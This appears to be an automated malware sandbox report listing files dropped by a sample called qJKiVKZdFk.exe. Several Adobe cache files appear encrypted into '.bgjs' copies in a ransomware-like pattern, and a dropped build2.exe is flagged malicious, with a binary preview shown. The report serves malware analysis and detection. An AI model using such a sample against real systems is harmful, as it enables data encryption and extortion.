                                                                                                                                      SHA-512:911350B6C2063E9BBA0B0B153530B4FAF38118F577F880C3BAD02ECD3C08DFE15CF10EBFD8DE4D66C3D0B60BA4BE94CB69F393681284020814EB8A654D5A493C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2023/....|..r..&~.5n.k)...a.Q.....;.;.x.......&......5.V.m.@2.%..n..JO.z...^...~.h!.i..=../j....O.z..6.s......Uq.80:su\.n..,.a.DF.4.%S...=.pu.]&ce.N...:...w...7LXm..*9..B.+.d!.;..L..}....k.F.cxd.9.Em-Y9.x.....l..*.;.......c..)o......v....|.#q]q....&...j.I....+........\..r.[.0.....~...gd.....l.uZh.yd.....@E<'.*...... ..d.B....~.v.Y.S`%........b.D.a..y|.5.z.C..E2|.z).Z....\......R8~W`..D.C.a.6mj.qK.5d~.r..aw._....y..5.]..]o........z ...g.R....r..C..g;E...X.. `$.Y..I.6.u..pf..8.....t..MD...Ba..P....1G4......Z.........U...l{..r,.>3.v.......+.OHb..o.*.....q.n ..%g.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):818
                                                                                                                                      Entropy (8bit):7.730689305312721
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YKWWIoCsbtQxI3z/m6clvuwH+yGyxNX3LQCxQLy3BBE7bD:YAIohbRbm6cxugnxNrQOB+/D
                                                                                                                                      MD5:6DDD38E8E952A3108C9986AACEEC83BD
                                                                                                                                      SHA1:E30FA25C46DCB1E7DCE810F867EDE097B3F90609
                                                                                                                                      SHA-256:82626B98290E8A1882561DB2E82847429BF8935F620AE9CAC2A8ECC9FCD61E61
                                                                                                                                      SHA-512:E8EC2F3723BE16A4E964244BED0E514751685096D64A74A3DABDF634444A8E9ADD331845D5FBCDE06805FD7C0BB43A36E940097B478144DA557A3DB1D1E12674
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"os_S.TA.Fh...W..Pw.J..]....}n;m.EH..j=#.S]D(.l..%6._LL...b..Zq,.....S.U....(.....U.Ge'.......~X.jfE......!..._.............k..c)..B.M.....kI8.K.Y..)x......`.R.X.....(X...+.I/IYWH`.s<3.@O...tC.Bk.s..pc[..x.J....q..I....f....b.......2.F.-pz...g....^L.zTV.tt95........'(.....x.....$M...T...^........R5..>.../Q. M.....&..t...-6]..z..G...Zn3.W/m..j._..H*.........>..$S....>...AnN..Z)<..?0..^.iVO+5y.7r..6.._....`$.w.....n^.b(9...h.......\8b9..}.?._.}.6........0..iJ. h2..e.a..._1.tPw]...h].L...@...CX;.W.3.+Gr.........&.z5....;G,.Db.KE.-^.a...,x.x2u{_Y.G...}6.t.%..{.7..h...$.p..;vjH.a....q..#...x..uX..x.'.....U@..Eu..U...T.N....#...P.@...'..h.x..Z5...5.T..<w'.....i..k(.@~..+....TL...5....#e.......G....js..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):818
                                                                                                                                      Entropy (8bit):7.730689305312721
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YKWWIoCsbtQxI3z/m6clvuwH+yGyxNX3LQCxQLy3BBE7bD:YAIohbRbm6cxugnxNrQOB+/D
                                                                                                                                      MD5:6DDD38E8E952A3108C9986AACEEC83BD
                                                                                                                                      SHA1:E30FA25C46DCB1E7DCE810F867EDE097B3F90609
                                                                                                                                      SHA-256:82626B98290E8A1882561DB2E82847429BF8935F620AE9CAC2A8ECC9FCD61E61
                                                                                                                                      SHA-512:E8EC2F3723BE16A4E964244BED0E514751685096D64A74A3DABDF634444A8E9ADD331845D5FBCDE06805FD7C0BB43A36E940097B478144DA557A3DB1D1E12674
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"os_S.TA.Fh...W..Pw.J..]....}n;m.EH..j=#.S]D(.l..%6._LL...b..Zq,.....S.U....(.....U.Ge'.......~X.jfE......!..._.............k..c)..B.M.....kI8.K.Y..)x......`.R.X.....(X...+.I/IYWH`.s<3.@O...tC.Bk.s..pc[..x.J....q..I....f....b.......2.F.-pz...g....^L.zTV.tt95........'(.....x.....$M...T...^........R5..>.../Q. M.....&..t...-6]..z..G...Zn3.W/m..j._..H*.........>..$S....>...AnN..Z)<..?0..^.iVO+5y.7r..6.._....`$.w.....n^.b(9...h.......\8b9..}.?._.}.6........0..iJ. h2..e.a..._1.tPw]...h].L...@...CX;.W.3.+Gr.........&.z5....;G,.Db.KE.-^.a...,x.x2u{_Y.G...}6.t.%..{.7..h...$.p..;vjH.a....q..#...x..uX..x.'.....U@..Eu..U...T.N....#...P.@...'..h.x..Z5...5.T..<w'.....i..k(.@~..+....TL...5....#e.......G....js..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3947
                                                                                                                                      Entropy (8bit):7.943529396143957
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:XMJYMWg7xH5S1blx6sf6bs6LYQOmZuXNzs7VpVj5ssNp+:XMJOg9H5ILBNs4mMNzsppVjuw+
                                                                                                                                      MD5:B217BA9A6CFC9C203FDB0E62D83C1FC7
                                                                                                                                      SHA1:1ECC9B0488270C5D52021498E1A4BEF6989A85C2
                                                                                                                                      SHA-256:93FFBDA3318502DF79F34C2EDC198FAF8558B8AB7439997D8EC7E23E5BFFB3A3
                                                                                                                                      SHA-512:3F65F78B72A92CB2F879669B94D49CDFB7883EC489874BE4851E10B63CAB50D48C1D936214621B45A876FA706FAFB306DA26CC8B5FC856C988210DB93304E90C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:*...#....._....*r..[p..S...n./.U...n/.#.S.f&>..*"...(.fM...fUt..7.Hq..K.e%...j.3..v.9r..f..X.u....:c..,H+*<k...f.....<.b...^.eGej....[^.$'...)O.(JQ&.k.{.V.$..~E...j..E.l.......tDS..U.o.....e.^......s~..:..ll....#.|..l.3.3...u....W0{..PFW{......$..m._.eM.=.-.x.C...u.I W=.E..:...f9H.^.qaZ7..h.{....'..X..~.a3....`..jD..}f..P .K..9.h...F.h....c....d..<HL.5T.4o....gxr....$E.@..b.M...Q...g^...c`.. .#..6.k....N .....p..4z...R..a".j...X...{..e.j:..bQ.n.M;.(Q.O9..p..{Fd,..%....>.3m....'.}......U...o..,.<@....w..$..._........6..T2y....a7..y....ys.a.'?]....t.a.......M..ox'......Y.&..X.+h....c.*.....Ps..d[W3..1.8NG..J..H.5......8....nh..z-...(..x.........<r.s.&K5..o0.&.V...^=..3&...Tg.)K..>.2....<lT......3q.2..zi?..m.z..s..<.s.A.u.....kJ..o!h......Qb....bt.&e.}..E.....G...*..h.`9........z.r"(.....m...f..m#.E...}K......xy.D`'R...5.J0.8..96H}...u.#..!...@.`_..~...z.#.1..G.a........&u..)..kR[.[......jd.0.T..{k..;u.x2(m..]...m2.P.....^4b.t...s...u./.*..E.....&.

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3947
                                                                                                                                      Entropy (8bit):7.943529396143957
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:XMJYMWg7xH5S1blx6sf6bs6LYQOmZuXNzs7VpVj5ssNp+:XMJOg9H5ILBNs4mMNzsppVjuw+
                                                                                                                                      MD5:B217BA9A6CFC9C203FDB0E62D83C1FC7
                                                                                                                                      SHA1:1ECC9B0488270C5D52021498E1A4BEF6989A85C2
                                                                                                                                      SHA-256:93FFBDA3318502DF79F34C2EDC198FAF8558B8AB7439997D8EC7E23E5BFFB3A3
                                                                                                                                      SHA-512:3F65F78B72A92CB2F879669B94D49CDFB7883EC489874BE4851E10B63CAB50D48C1D936214621B45A876FA706FAFB306DA26CC8B5FC856C988210DB93304E90C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:*...#....._....*r..[p..S...n./.U...n/.#.S.f&>..*"...(.fM...fUt..7.Hq..K.e%...j.3..v.9r..f..X.u....:c..,H+*<k...f.....<.b...^.eGej....[^.$'...)O.(JQ&.k.{.V.$..~E...j..E.l.......tDS..U.o.....e.^......s~..:..ll....#.|..l.3.3...u....W0{..PFW{......$..m._.eM.=.-.x.C...u.I W=.E..:...f9H.^.qaZ7..h.{....'..X..~.a3....`..jD..}f..P .K..9.h...F.h....c....d..<HL.5T.4o....gxr....$E.@..b.M...Q...g^...c`.. .#..6.k....N .....p..4z...R..a".j...X...{..e.j:..bQ.n.M;.(Q.O9..p..{Fd,..%....>.3m....'.}......U...o..,.<@....w..$..._........6..T2y....a7..y....ys.a.'?]....t.a.......M..ox'......Y.&..X.+h....c.*.....Ps..d[W3..1.8NG..J..H.5......8....nh..z-...(..x.........<r.s.&K5..o0.&.V...^=..3&...Tg.)K..>.2....<lT......3q.2..zi?..m.z..s..<.s.A.u.....kJ..o!h......Qb....bt.&e.}..E.....G...*..h.`9........z.r"(.....m...f..m#.E...}K......xy.D`'R...5.J0.8..96H}...u.#..!...@.`_..~...z.#.1..G.a........&u..)..kR[.[......jd.0.T..{k..;u.x2(m..]...m2.P.....^4b.t...s...u./.*..E.....&.

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):666
                                                                                                                                      Entropy (8bit):7.645078506956093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:k7T+shKMn16CMSYcTDkxZEG0EfqtPmLxPaK98EEEg53UImtJNdg7ukIcii9a:w+shX16POMxmnEqgPaK7DImBdgobD
                                                                                                                                      MD5:B8D268CF65FE3DF4F081473E526B3967
                                                                                                                                      SHA1:8E53C0492D8A4E1F096755409694DFC398E289C0
                                                                                                                                      SHA-256:C283B60A4BECBD1CEDF1098D15798C92E166DB8040BE5312E6998F8D3EAE904F
                                                                                                                                      SHA-512:8616DE098AE1B6DF1AABCF0193116B4D8B2476AA026546B9870AADAAD8A64941DEFAD3B39EAE1EB3373889F8E2E3B0932EB7CC96D863424C53F32C2A7FF62B7E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2023/q.P..yy.5.....$3.dZ.Lixn"xsT..lD..t..R..@...~..h..y...'...4.H......Y........`.....A...bAoi.KZ\.O...[..%%.\..|.^.t......b.=./...m;A.......8.{.@E...~..b..qZ....c...H.o....C..0.....}..F..G. >.P..E&..@.\.6..)c... ca.l.`.CB,.j....@.......Lj.`j]...!.UB..AD......-4.....fz>..{.....pf.19,:...l..^\C.]_m?......(q.o.]gQ..`j X....K.]jU............Z......e.?..s.....R..]..{....c.......xTS..m'....'.....~.%c.8.h"[..3q...$.1.?...jW...K...-;...^..?.....,8.2T..L^m..-.[.Fi...[w...N:J.n......].q...<....f..m..>./\I..P..R.._.v..K.u.F.s....&/h.._>,..T...l$............i.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):666
                                                                                                                                      Entropy (8bit):7.645078506956093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:k7T+shKMn16CMSYcTDkxZEG0EfqtPmLxPaK98EEEg53UImtJNdg7ukIcii9a:w+shX16POMxmnEqgPaK7DImBdgobD
                                                                                                                                      MD5:B8D268CF65FE3DF4F081473E526B3967
                                                                                                                                      SHA1:8E53C0492D8A4E1F096755409694DFC398E289C0
                                                                                                                                      SHA-256:C283B60A4BECBD1CEDF1098D15798C92E166DB8040BE5312E6998F8D3EAE904F
                                                                                                                                      SHA-512:8616DE098AE1B6DF1AABCF0193116B4D8B2476AA026546B9870AADAAD8A64941DEFAD3B39EAE1EB3373889F8E2E3B0932EB7CC96D863424C53F32C2A7FF62B7E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2023/q.P..yy.5.....$3.dZ.Lixn"xsT..lD..t..R..@...~..h..y...'...4.H......Y........`.....A...bAoi.KZ\.O...[..%%.\..|.^.t......b.=./...m;A.......8.{.@E...~..b..qZ....c...H.o....C..0.....}..F..G. >.P..E&..@.\.6..)c... ca.l.`.CB,.j....@.......Lj.`j]...!.UB..AD......-4.....fz>..{.....pf.19,:...l..^\C.]_m?......(q.o.]gQ..`j X....K.]jU............Z......e.?..s.....R..]..{....c.......xTS..m'....'.....~.%c.8.h"[..3q...$.1.?...jW...K...-;...^..?.....,8.2T..L^m..-.[.Fi...[w...N:J.n......].q...<....f..m..>./\I..P..R.._.v..K.u.F.s....&/h.._>,..T...l$............i.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):387
                                                                                                                                      Entropy (8bit):7.347507159552474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:er+wpSMEWMgCkJRaEC/pO3k+BxRvrDq56EBmsbdHPfc9Tq33ukIcii96Z:i+wgME3wQ/pO3Nn2vvxc9TAukIcii9a
                                                                                                                                      MD5:00435C6CE489634914C831D78F142E85
                                                                                                                                      SHA1:933B37A4DFCA645B2929A0EBB8D0C4569B9CDBD5
                                                                                                                                      SHA-256:FEFAE45F46D8F926A6C9B6EC5C86002F8F7288AB172DF9B259AF6388C6D80257
                                                                                                                                      SHA-512:757D44D0109F9E2A9BE4C814078FD47F3C441B761D23A2166085FE436BDF5D468A59735FF05CE7B22DF0356E72FAD8EFEAB9D886BC0AE8FAE5B7D8418C9C0D81
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:O7U:..J5{z..x...,...9..8...,..+Kq.z.k.:.......E.....'m%...0.9V....`....A`......Z...z7.&...un,..6<t....z...?.....=.^.?%t6..b...9F..#..x..~/....-.....tF..k..?t.......oW.-..|..s...d.*..]p.....]#....}...dK..#..QGr...e].F...=p.a.ADf.{/...s.K....6%...z...%..d......o?.. .$p....~.q._.e+....(|[..8.vjtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):387
                                                                                                                                      Entropy (8bit):7.347507159552474
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:er+wpSMEWMgCkJRaEC/pO3k+BxRvrDq56EBmsbdHPfc9Tq33ukIcii96Z:i+wgME3wQ/pO3Nn2vvxc9TAukIcii9a
                                                                                                                                      MD5:00435C6CE489634914C831D78F142E85
                                                                                                                                      SHA1:933B37A4DFCA645B2929A0EBB8D0C4569B9CDBD5
                                                                                                                                      SHA-256:FEFAE45F46D8F926A6C9B6EC5C86002F8F7288AB172DF9B259AF6388C6D80257
                                                                                                                                      SHA-512:757D44D0109F9E2A9BE4C814078FD47F3C441B761D23A2166085FE436BDF5D468A59735FF05CE7B22DF0356E72FAD8EFEAB9D886BC0AE8FAE5B7D8418C9C0D81
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:O7U:..J5{z..x...,...9..8...,..+Kq.z.k.:.......E.....'m%...0.9V....`....A`......Z...z7.&...un,..6<t....z...?.....=.^.?%t6..b...9F..#..x..~/....-.....tF..k..?t.......oW.-..|..s...d.*..]p.....]#....}...dK..#..QGr...e].F...=p.a.ADf.{/...s.K....6%...z...%..d......o?.. .$p....~.q._.e+....(|[..8.vjtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):460
                                                                                                                                      Entropy (8bit):7.497190690443111
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:GPt419z350aOXOdr+opSoEbzyRm7tuukIcii9a:GFy3jOepX0fzlJbD
                                                                                                                                      MD5:C4E84DE917FF68F1D15D8389B3EFF4A2
                                                                                                                                      SHA1:6666F381566A8F0F04A7A917DD64958432EB6D22
                                                                                                                                      SHA-256:EA630A2097C1AF9A0A1A6E28E533F60E7B2578522EA489A4364A527E2C8737CF
                                                                                                                                      SHA-512:0B56825290B0F01692A1DAAF5FF30F998EB0ED4027350F45B6900CAF3D6E62B2B59C13585BA29729FE95331FD699F3A959F67FC10DD5D25C5B1C6B26BAA61AF7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.h.6..5...\.o.,.Q....z...Hm<!..\...(bN....@c?..{....Q.h.&..{$..{....-.E........w.w{.*.x2:.....7E.6._...+...\..,...,.....^3..k....D.!..m..IY.cm.l...O.<;...y|"..r..J~..;,...Ri..{......S..$H=Zg.' ..D..~.l..V....1..mU.....1.r 2..-.q.iv.{.g.f.%.`...Zw...FJ....g......r@..M-.a...".+[8)u...<... U'k.|F.h.....$fsb....Da..tN.4.y....ld....r..L....vu.3..(..y$...g.W. .|.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):460
                                                                                                                                      Entropy (8bit):7.497190690443111
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:GPt419z350aOXOdr+opSoEbzyRm7tuukIcii9a:GFy3jOepX0fzlJbD
                                                                                                                                      MD5:C4E84DE917FF68F1D15D8389B3EFF4A2
                                                                                                                                      SHA1:6666F381566A8F0F04A7A917DD64958432EB6D22
                                                                                                                                      SHA-256:EA630A2097C1AF9A0A1A6E28E533F60E7B2578522EA489A4364A527E2C8737CF
                                                                                                                                      SHA-512:0B56825290B0F01692A1DAAF5FF30F998EB0ED4027350F45B6900CAF3D6E62B2B59C13585BA29729FE95331FD699F3A959F67FC10DD5D25C5B1C6B26BAA61AF7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.h.6..5...\.o.,.Q....z...Hm<!..\...(bN....@c?..{....Q.h.&..{$..{....-.E........w.w{.*.x2:.....7E.6._...+...\..,...,.....^3..k....D.!..m..IY.cm.l...O.<;...y|"..r..J~..;,...Ri..{......S..$H=Zg.' ..D..~.l..V....1..mU.....1.r 2..-.q.iv.{.g.f.%.`...Zw...FJ....g......r@..M-.a...".+[8)u...<... U'k.|F.h.....$fsb....Da..tN.4.y....ld....r..L....vu.3..(..y$...g.W. .|.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\.curlrc

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):342
                                                                                                                                      Entropy (8bit):7.21198386768036
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:KWu2PXo3M3im8Hun2MX+RT6L+8pMI8WHbc78z3r1UdI2z6G3ukIcii96Z:Ni3+i9HoNnpMI8C7r15AukIcii9a
                                                                                                                                      MD5:4CB2521FA6BC30E3BD96138E764A9C77
                                                                                                                                      SHA1:0D85CF8AB27B2ADAACED071816FF5E0D9AFBEFDC
                                                                                                                                      SHA-256:A372E68B106E11B1FC00AE18F0EE6449B1081435AA482326121FA2592ECCD254
                                                                                                                                      SHA-512:D942EC5568085463C02FBB3255244CACECCE64618790121301F5E32ADC7F02C88B144BCAD664F54829DB54BD2AFC99E3897BE998A72524CAE8554B399A2AA2C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:insecMS.Z..).......X..S...3.=...f.w..6.....x.Y.n.,...A.=K"c.a.v.....;...~8.E......]"..z..u....C.n.......TCW.n...)...t. . .B...........i.$D.).\].k>...c.+.....be....[>....%=>...N%.K}.vMY....=...Q.Gc..kX...G.....'.u..Km7........c2.5......%...3.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):296782
                                                                                                                                      Entropy (8bit):7.620856117676261
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:13QHJFla1q8dXCPV+jo61UzBVIYA6iQeIL8EX:13wFl2ej61ULLfX
                                                                                                                                      MD5:959C2CE8C314373A333D9E228D07515E
                                                                                                                                      SHA1:9CA9AF5F9038E1EAA0ED1953A60465139A461B05
                                                                                                                                      SHA-256:A153E97485B1501A61C22C979B6D5D1B0B12EB176784E291D5818C5561F58268
                                                                                                                                      SHA-512:C7CE535145A0AACB415FF47AF9BD3E4D5373CF107EEC837879ACC26EA043D85E69785929A554FD453526A101F3E4BA0EBFA5A42CEFBD3DA8B318A813372AEBC9
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ.......B..%...,.'.y.N.J.9)|...J.B......+q.a.W......N3:.B....C..7..5.....0.....Ga..j&...o...0...Q.u.G.Z...>Z..2G+......O`....=..........T.r!..:....x4.S..u..0.h......U.Waj..d......`..m.}..*..JKzDm:G7..................W.....dA!...Z..|.........6......./...........5....K.u_....e..P?p..[s.5[...r.......[6..e.3&q%. ......)..El.Dr........s.....H.....&.%.g...4U..lM.).8..yNeb..w...>....D....+...W..l..g;.~..Ov."....E...5..V.Z.f@KF.O.o..0.`..&.n......P!..`....l.k.~.LU.9jW.H....'N.K.`..%#.df...`?...Y....^...I.....3..=.y%...:M!..n.v.".3.l,FD.8..........$....D..9.2Y{Enk.iD{...b..Gz.+...A.'4..Rk.*.3!..;...NA....8.?V..b..E.^....2.x.f+{.v. .WB..m'.r.u2k.t.G..cuue..~\G.}..........O?.J......'(%.&_C.qB.,.C.;lr0(.aEa.d/$x.mU..p..e.h.K..k|M#.w..6...x.o.....1..2t+m83...(Q.....4.....S*.-.k5i.Q....,.............>..j.M.2Q.LX...H..-.f"g.B....O........%;...w..{*H.7.c.....C..&r..n..../.......r.g:.dy*...WI.*&.CG.jC$....>..({PF.EpFz..l.[g.d..{#..g...S.._.g.[.@db}.X

                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1567
                                                                                                                                      Entropy (8bit):7.864428334955491
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Y2H0ukP6Are8z5eB9f61jMEpqJeIiUvK9EkNLv8NYYOWFPH5zlUSH/m5tCBOi6L2:tHTGrLef61gFWEkNiPb1eHCBOi0OD
                                                                                                                                      MD5:A5DB53A65735D47686F04457C6735087
                                                                                                                                      SHA1:D2BA7DAB96F8364D0C01255B2DC677376AD8DE6C
                                                                                                                                      SHA-256:60123DD1A7C29D4172BA5ACEBC4C4E990DDCB1A2CB8C615849DF8B2E0FF1433F
                                                                                                                                      SHA-512:2D4EF8D19BD8F5D915D6FD002A303AF8092F44B7D08FEF60C8E81E63CF0B37D5E795B8D6274F670FB8ED118A77F7F6A014E19CCE8599E1FCC790A5E9FDA538E7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%!Adou@a.vQ......{...z...E.2..^}f.z.,].g.Q.A.(.7..&.....8G..V....V.H...2z...ufwtJ5.B3..=.....6z._!..2.sc..m..,7..Rvc.71QF.&.$.Cc|...d.:...]@..A."i.....M.#..a}.VS<.F.l..g..B.X..!.7.o.k.*?....d.w..Om.$..B.....&..1&..\Q.(.].+=.*)U..n.^..+6V..NfF...C(....L..c.?......w.t....7L..T0O...s.. ..4f!(..<.>.Ab..YV...Oa.!Z.0}<(..%.g...b.a.b.....TIaIW.....3.YC.{.n...y..M.L..2..Z.!..)rYMl.!]....X...Y....8.....W.u5"C.$....|...B..+........M#tc.-...Su...;.>y]E.}.H.......on.....6q....H..+[x....0(...S...x.J.......<.h....k.X]..X![.A..O.<...X..jcDH[B...G....PM]<..N....mw.8..y....c.....O.0...g....,c......r..5.5....v".>.......m.Z.....3d..,e.....R88.{..6...%...q...'G.o..S.i.n..[........2. 6+...q....g....b........aI`7....E...p./..!..t...@.Z...o....'...@.1?9.)..C4.u...VQ..&.{p.....<h32...?..?I..$G....l.|....zl^W.1..7.M`.P.q6..+.>J=..Q.^.M....+.Z...H.,.o..t>B'..}..g...d85.^2......K.b.o.B.,...2p.Z................-...~..[r.#"Rv4B~.....s>.]<K..8..Y.jweW.;..

                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):185433
                                                                                                                                      Entropy (8bit):7.876516367361401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:iT/devjDCIwmcnYCunHjltAnHTJPUFJoHUW/tSsaLIHyd8cdSl7535VPFqcoIrnV:wQXCIRFnDlcuroHUdsdHypdm9PPsc1rV
                                                                                                                                      MD5:CFC27E52227225AD74D58BB7611C86E5
                                                                                                                                      SHA1:2643AF7A341B3881919C9D4D259C913A6D10A12D
                                                                                                                                      SHA-256:9DA5979B8C8B30642E7271159ED53C542A02F13DE3C5F94946857B92B85F07DE
                                                                                                                                      SHA-512:DA46D7EE563ECBA0E066C3C297DA8360E8C1113E6C32D123630ECF91DD41997D41B995B731A832CF207BF1EA628D35824AD248A6EB754CAB96F013EFBC91FBBD
                                                                                                                                      Malicious:false
